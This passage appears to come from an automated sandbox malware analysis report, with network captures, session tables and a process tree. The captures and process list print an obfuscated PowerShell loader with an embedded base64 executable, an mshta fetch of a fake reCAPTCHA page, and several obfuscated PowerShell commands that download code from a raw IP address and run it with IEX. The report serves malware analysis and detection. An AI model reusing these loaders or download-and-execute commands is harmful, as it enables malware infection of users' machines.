                                                                                                                                                                                                Data Raw: 0d 0a 20 24 74 30 3d 27 49 51 49 51 51 49 49 51 49 51 51 45 58 27 2e 72 65 70 6c 61 63 65 28 27 49 51 49 51 51 27 2c 27 27 29 3b 73 61 6c 20 47 47 20 24 74 30 3b 0d 0a 0d 0a 24 4f 45 3d 22 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 4b 63 4f 66 57 63 41 41 41 41 41 41 41 41 41 41 4f 41 41 4c 69 45 4c 41 54 41 41 41 44 77 42 41 41 42 41 41 51 41 41 41 41 41 41 69 6c 73 42 41 41 41 67 41 41 41 41 59 41 45 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 41 42 41 41 41 41 41 41 41 41 41 41 45 41 41 41 41 41 41 41 41 41 [TRUNCATED]
                                                                                                                                                                                                Data Ascii: $t0='IQIQQIIQIQQEX'.replace('IQIQQ','');sal GG $t0;$OE="qQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAKcOfWcAAAAAAAAAAOAALiELATAAADwBAABAAQAAAAAAilsBAAAgAAAAYAEAAABAAAAgAAAAAgAABAAAAAAAAAAEAAAAAAAAAACgAQAAAgAAAAAAAAMAYIUAABAAABAAAAAAEAAAEAAAAAAAABAAAAAAAAAAAAAAADBbAQBXAAAAAIABAFQDAAAAAAAAAAAAAAAAAAAAAAAAAGABAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAACAAAAAAAAAAAAAAACCAAAEgAAAAAAAAAAAAAAC50ZXh0AAAAkDsBAAAgAAAAPAEAAAIAAAAAAAAAAAAAAAAAACAAAGAucmVsb2MAAAwAAAAAYAEAAAIAAAA+AQAAAAAAAAAAAAAAAABAAABCLnJzcmMAAABUAwAAAIABAAAEAAAAQAEAAAAAAAAAAAAAAAAAQAAAQAAAAAAAAAAAAAAAAAAAAABsWwEAAAAAAEgAAAACAAUABKEAACy6AAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABMwAwBUAAAAAQAAESjuAAAGIHCo0kMgq9e2e2ElChpeRQQAAADc////FgAAACoAAAACAAAAKygouQIABgYgtu0jplogwH05lmEryyihAgAGBiBkOmUxWiDFoMEzYSu3KhMwCgAMAQAAAgAAESBihoadKAEAACs
                                                                                                                                                                                                Jan 15, 2025 10:09:10.062422037 CET1236INData Raw: 4b 4b 47 77 43 41 41 59 6f 5a 51 45 41 42 67 73 48 49 4c 4b 41 55 38 63 6f 41 67 41 41 4b 78 63 6f 51 41 49 41 42 68 4d 45 45 51 51 57 4b 44 73 43 41 41 59 6f 32 41 41 41 42 71 49 52 42 43 69 4b 41 51 41 47 44 41 67 73 66 69 43 62 68 62 2b 38 49
                                                                                                                                                                                                Data Ascii: KKGwCAAYoZQEABgsHILKAU8coAgAAKxcoQAIABhMEEQQWKDsCAAYo2AAABqIRBCiKAQAGDAgsfiCbhb+8IB3ckeBhJRMGG15FBQAAANf///8FAAAAoAAAAFUAAACDAAAAOJsAAAAgvUw9NCgDAAArCBQXKP8AAAYTBREFFgYgr2/09igCAAArKAECAAaiEQUoeAIABiixAgAGLQggUC2DfyUrBiA8vCFyJSYRBiBRoAwSWmErhx
                                                                                                                                                                                                Jan 15, 2025 10:09:10.062433958 CET1236INData Raw: 77 42 41 41 47 41 41 41 41 41 51 41 41 45 53 6a 5a 41 67 41 47 4b 67 41 41 45 7a 41 45 41 41 63 41 41 41 41 42 41 41 41 52 41 69 69 72 41 51 41 47 4b 67 41 54 4d 41 51 41 42 77 41 41 41 41 45 41 41 42 45 43 4b 4c 55 41 41 41 59 71 41 42 4d 77 42
                                                                                                                                                                                                Data Ascii: wBAAGAAAAAQAAESjZAgAGKgAAEzAEAAcAAAABAAARAiirAQAGKgATMAQABwAAAAEAABECKLUAAAYqABMwBAAHAAAAAQAAEQIoqwEABioAEzAEAAcAAAABAAARAig6AgAGKgATMAgAdgEAAAQAABECKMgBAAYKcy8AAAYLIG9vS4ogJEysgWElEwkfDF5FDAAAABQBAAAbAAAAuv///4wAAABlAAAA3wAAAP4AAAAuAAAAxQAAAA
                                                                                                                                                                                                Jan 15, 2025 10:09:10.062452078 CET1236INData Raw: 34 63 76 37 2f 2f 78 45 45 46 31 67 54 42 42 45 4d 49 4d 6e 59 63 6c 56 61 49 48 52 6b 74 74 46 68 4f 46 6e 2b 2f 2f 38 52 44 43 44 41 6b 32 2f 65 57 69 41 46 57 55 53 32 59 54 68 47 2f 76 2f 2f 45 51 67 6f 49 51 45 41 42 6f 41 42 41 41 41 45 45
                                                                                                                                                                                                Data Ascii: 4cv7//xEEF1gTBBEMIMnYclVaIHRkttFhOFn+//8RDCDAk2/eWiAFWUS2YThG/v//EQgoIQEABoABAAAEEQwgOyOvkVogNl4kIWE4J/7//xEFHxBYEwURDCAN0E+OWiDs0WVtYTgN/v//EQofEC8IILcaN0MlKwYgdqmKOiUmOPP9//8RBxEKlRMLIE1un2I44v3//xEIEQYlF1gTBhEL0pwRCBEGJRdYEwYRCx5k0pwRCBEGJR
                                                                                                                                                                                                Jan 15, 2025 10:09:10.062463999 CET896INData Raw: 6f 66 67 45 41 42 68 45 48 49 4c 48 6a 32 58 74 61 49 44 4e 6c 4f 6a 70 68 4b 34 41 47 62 68 64 71 4d 77 67 67 69 65 4a 55 71 79 55 72 42 69 43 78 35 79 76 54 4a 53 59 34 5a 76 2f 2f 2f 77 5a 75 47 57 6f 75 43 43 44 56 77 58 70 62 4a 53 73 47 49
                                                                                                                                                                                                Data Ascii: ofgEABhEHILHj2XtaIDNlOjphK4AGbhdqMwggieJUqyUrBiCx5yvTJSY4Zv///wZuGWouCCDVwXpbJSsGIATcqHwlJhEHICgXtyhaYThD////fgEAAAQCCRb+HAEAABsofgEABhEHIJ26mqRaIBwhyU5hOB3///8XjQEAABsNEQcg1OoYvVog+H9ioGE4A////wIYYhAAEQcgG5JUT1ogrMFZhGE46/7//xEGpQEAABsLEQcgaj
                                                                                                                                                                                                Jan 15, 2025 10:09:10.062475920 CET1236INData Raw: 67 53 4e 36 76 49 6d 45 51 41 41 49 66 48 6d 51 4b 49 42 69 73 75 74 55 67 56 46 49 32 6d 32 45 6c 45 77 63 66 45 46 35 46 45 41 41 41 41 4d 45 41 41 41 43 43 41 51 41 41 51 67 45 41 41 41 55 41 41 41 43 71 2f 2f 2f 2f 4b 77 49 41 41 4e 51 41 41
                                                                                                                                                                                                Data Ascii: gSN6vImEQAAIfHmQKIBisutUgVFI2m2ElEwcfEF5FEAAAAMEAAACCAQAAQgEAAAUAAACq////KwIAANQAAAA4AAAACAIAAHICAAAcAAAA7wAAAKYAAABcAQAAQwIAAFIAAAA4bQIAAAZuGGouCCC9MCuLJSsGIAswqp0lJiuTAiD///8/XxAAEQcgLnREhVog3XrN0WE4d////xeNAQAAGw0RByCQmksPWiAZ+82nYThd////fg
                                                                                                                                                                                                Jan 15, 2025 10:09:10.062489033 CET1236INData Raw: 6d 46 6a 53 78 4a 53 59 34 54 2f 2f 2f 2f 78 45 48 49 45 78 63 2b 6a 56 61 49 4b 41 55 6d 43 6c 68 4f 44 7a 2f 2f 2f 39 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 35 69 59 48 34 42 41
                                                                                                                                                                                                Data Ascii: mFjSxJSY4T////xEHIExc+jVaIKAUmClhODz///9+AQAABAIlF1gQAOCRfgEAAAQCJRdYEADgkR5iYH4BAAAEAiUXWBAA4JEfEGJgfgEAAAQCJRdYEADgkR8YYmATBH4BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMF0AEAABsoegEABihwAgAGEQUomQIABh
                                                                                                                                                                                                Jan 15, 2025 10:09:10.062500000 CET1236INData Raw: 34 4c 76 37 2f 2f 33 34 42 41 41 41 45 41 69 55 58 57 42 41 41 34 4a 46 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41 4f 43 52 48 6d 4a 67 66 67 45 41 41 41 51 43 4a 52 64 59 45 41 44 67 6b 52 38 51 59 6d 42 2b 41 51 41 41 42 41 49 6c 46 31 67 51 41
                                                                                                                                                                                                Data Ascii: 4Lv7//34BAAAEAiUXWBAA4JF+AQAABAIlF1gQAOCRHmJgfgEAAAQCJRdYEADgkR8QYmB+AQAABAIlF1gQAOCRHxhiYBMEEQcgmHQHvFogTOnfTGE42v3//9ABAAAbKHoBAAYocAIABhEFKJkCAAYTBn4BAAAEAhEGFhEEGlkofgEABhEHIA2IBp5aIHdvraVhOJ39//8SAf4VAQAAGxEHIFLA+g1aIGJEynhhOIL9//8CGGIQAA
                                                                                                                                                                                                Jan 15, 2025 10:09:10.062511921 CET1236INData Raw: 54 42 64 41 42 41 41 41 62 4b 48 6f 42 41 41 59 6f 63 41 49 41 42 68 45 46 4b 4a 6b 43 41 41 59 54 42 6e 34 42 41 41 41 45 41 68 45 47 46 68 45 45 47 6c 6b 6f 66 67 45 41 42 68 45 48 49 4e 69 4a 37 61 74 61 49 46 47 4e 61 31 31 68 4f 47 33 39 2f
                                                                                                                                                                                                Data Ascii: TBdABAAAbKHoBAAYocAIABhEFKJkCAAYTBn4BAAAEAhEGFhEEGlkofgEABhEHINiJ7ataIFGNa11hOG39//8CIP///z9fEAACGGIQABEHIAJahUhaIE246W1hOEz9//8CHx5kChEHIDI3x+haIGI7kH5hODT9//8RByDFzIZBWiDHSLoZYTgh/f//ByoAAAATMAgA9QQAAAUAABEgcAAAAAogxUI+8iBPmDDbYSUTDB8jXkUjAA
                                                                                                                                                                                                Jan 15, 2025 10:09:10.062526941 CET1236INData Raw: 73 79 64 43 73 4a 53 73 47 49 45 31 61 51 6f 41 6c 4a 6a 6a 31 2f 50 2f 2f 46 68 4d 4a 49 4e 51 6a 6a 4c 6f 34 36 50 7a 2f 2f 78 38 51 4b 41 6f 43 41 41 59 54 42 78 45 4d 49 4d 51 76 6b 6c 4e 61 49 50 4e 46 33 52 52 68 4f 4d 7a 38 2f 2f 38 52 42
                                                                                                                                                                                                Data Ascii: sydCsJSsGIE1aQoAlJjj1/P//FhMJINQjjLo46Pz//x8QKAoCAAYTBxEMIMQvklNaIPNF3RRhOMz8//8RBxEJBxEFEQlYlZ4g59rCrTi2/P//Bhpa4Ci8AQAGEwgRDCDn8ZNjWiCQKLU7YTiY/P//EQQXWBMEEQwgh/tfV1ogSBq+xGE4f/z//xEHGREHGZUIGZVhnhEMIM5LGmRaIM/poDJhOGD8//8gXq8gaQ0WEwQRDCDKpD
                                                                                                                                                                                                Jan 15, 2025 10:09:10.067409992 CET1236INData Raw: 59 57 69 44 4a 75 4d 30 5a 59 54 6a 2b 2f 76 2f 2f 41 77 4e 37 43 41 41 41 42 42 35 69 41 33 73 4b 41 41 41 45 4b 46 34 43 41 41 59 6c 4a 74 4a 67 66 51 67 41 41 41 51 44 4a 58 73 4a 41 41 41 45 48 6d 4a 39 43 51 41 41 42 41 63 67 64 53 53 43 47
                                                                                                                                                                                                Data Ascii: YWiDJuM0ZYTj+/v//AwN7CAAABB5iA3sKAAAEKF4CAAYlJtJgfQgAAAQDJXsJAAAEHmJ9CQAABAcgdSSCGFogMdD6C2E4wf7//wMlewkAAAQeYn0JAAAEByDNHZEjWiCCi0RpYTih/v//AyV7CQAABAZZfQkAAAQgYUxpzjiJ/v//A3sJAAAEIAAAAAE0CCA626lfJSsGILM4QB8lJgcgFZpp4FphOGD+//8XKgADMAkABwAAAA


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.54970492.255.57.1204436488C:\Windows\System32\mshta.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-15 09:09:05 UTC341OUTGET /recaptcha-verify.html HTTP/1.1
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Accept-Language: en-CH
                                                                                                                                                                                                UA-CPU: AMD64
                                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                                                                Host: view-reserve.com
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                2025-01-15 09:09:06 UTC262INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Wed, 15 Jan 2025 09:09:05 GMT
                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                Content-Length: 31911
                                                                                                                                                                                                Last-Modified: Sun, 12 Jan 2025 14:57:08 GMT
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                ETag: "6783d844-7ca7"
                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                2025-01-15 09:09:06 UTC16122INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 0d 0a 09 09 09 09 09 09
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
                                                                                                                                                                                                2025-01-15 09:09:06 UTC15789INData Raw: 71 53 0f 5a 43 4e 45 55 32 53 13 63 77 54 2b 53 17 7f 6d 59 7a 64 4e 4e 53 1c 4e 7c 59 71 53 75 53 20 4b 52 4e 55 53 24 78 71 58 14 4e 59 55 33 4e 5b 4f 75 4a 72 53 2c 4e 09 4f 5c 27 59 1a 62 3f 4e 63 53 34 4e 65 61 5b 70 68 53 38 4e 69 60 71 4e 6c 61 66 74 0b 53 3e 63 52 4e 71 49 23 5e 34 59 33 4e 75 57 71 54 35 5a 15 53 47 4f 75 61 7a 4f 78 4e 50 5c 5c 51 59 42 63 52 4a 1c 59 14 62 2d 4d 03 59 4a 4d 06 59 7e 4d 08 5c 5c 0f 4e 1f 60 18 4a 3c 5c 5c 1e 4d 5c 72 60 1e 4d 0f 69 37 4d 11 59 5c 5c 4c 69 59 60 4d 16 53 67 4d 19 59 68 60 35 49 30 4d 1f 58 07 53 73 59 07 53 76 61 1a 4d 25 50 5e 53 7a 4d 28 59 7a 53 7f 52 47 4f 7e 4d 2f 55 09 52 06 61 30 52 08 4d 35 52 0b 60 63 58 0c 79 51 60 67 4d 3a 58 11 4d 3c 59 0e 58 15 52 17 53 1c 60 76 52 1b 64 79 4b 1e 7f
                                                                                                                                                                                                Data Ascii: qSZCNEU2ScwT+SmYzdNNSN|YqSuS KRNUS$xqXNYU3N[OuJrS,NO\'Yb?NcS4Nea[phS8Ni`qNlaftS>cRNqI#^4Y3NuWqT5ZSGOuazOxNP\\QYBcRJYb-MYJMY~M\\N`J<\\M\r`Mi7MY\\LiY`MSgMYh`5I0MXSsYSvaM%P^SzM(YzSRGO~M/URa0RM5R`cXyQ`gM:XM<YXRS`vRdyK


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.549711104.102.49.2544437328C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2025-01-15 09:09:12 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                Host: steamcommunity.com
                                                                                                                                                                                                2025-01-15 09:09:13 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                Date: Wed, 15 Jan 2025 09:09:13 GMT
                                                                                                                                                                                                Content-Length: 25665
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Set-Cookie: sessionid=aa43d1ebae0c2f87f653d5ac; Path=/; Secure; SameSite=None
                                                                                                                                                                                                Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                2025-01-15 09:09:13 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                2025-01-15 09:09:13 UTC11186INData Raw: 3f 6c 3d 6b 6f 72 65 61 6e 61 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 6b 6f 72 65 61 6e 61 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e ed 95 9c ea b5 ad ec 96 b4 20 28 4b 6f 72 65 61 6e 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 70 6f 70 75 70 5f 6d 65 6e 75 5f 69 74 65 6d 20 74 69 67 68 74 22 20 68 72 65 66 3d 22 3f 6c 3d 74 68 61 69 22 20 6f 6e 63 6c 69 63 6b 3d 22 43 68 61 6e 67 65 4c 61 6e 67 75 61 67 65 28 20 27 74 68 61 69 27 20 29 3b 20 72 65 74 75 72 6e 20 66 61 6c 73 65 3b 22 3e e0 b9 84 e0 b8 97 e0 b8 a2 20 28 54 68 61 69 29 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09
                                                                                                                                                                                                Data Ascii: ?l=koreana" onclick="ChangeLanguage( 'koreana' ); return false;"> (Korean)</a><a class="popup_menu_item tight" href="?l=thai" onclick="ChangeLanguage( 'thai' ); return false;"> (Thai)</a>


                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                                                                                Click to jump to process

                                                                                                                                                                                                Target ID:0
                                                                                                                                                                                                Start time:04:09:01
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\00.ps1"
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:1
                                                                                                                                                                                                Start time:04:09:01
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:3
                                                                                                                                                                                                Start time:04:09:03
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\system32\mshta.exe" https://view-reserve.com/recaptcha-verify.html
                                                                                                                                                                                                Imagebase:0x7ff744330000
                                                                                                                                                                                                File size:14'848 bytes
                                                                                                                                                                                                MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:moderate
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:4
                                                                                                                                                                                                Start time:04:09:05
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                Imagebase:0x7ff7e52b0000
                                                                                                                                                                                                File size:55'320 bytes
                                                                                                                                                                                                MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:false

                                                                                                                                                                                                Target ID:5
                                                                                                                                                                                                Start time:04:09:05
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/1.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:6
                                                                                                                                                                                                Start time:04:09:05
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                Imagebase:0x7ff6d64d0000
                                                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:7
                                                                                                                                                                                                Start time:04:09:06
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/2.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                                                                                                Imagebase:0x7ff7be880000
                                                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                                Reputation:high
                                                                                                                                                                                                Has exited:true

                                                                                                                                                                                                Target ID:8
                                                                                                                                                                                                Start time:04:09:06
                                                                                                                                                                                                Start date:15/01/2025
                                                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $c1='%%(N%%ew-O%%%bje%%%ct N%%%et.W%%%e'; $c4='b%%Cl%%%%ie%%nt%%).%%%D%%%ow%nl%%o%%'; $c3='a%%dSt%%%%ri%%%%%n%%%g(''http://92.255.57.112/1/3.png'')';$TC=($c1,$c4,$c3 -Join '');$TC=$TC.replace('%','');I`E`X $TC|I`E`X
                                                                                                                                                                                                Imagebase:0x7ff7be880000
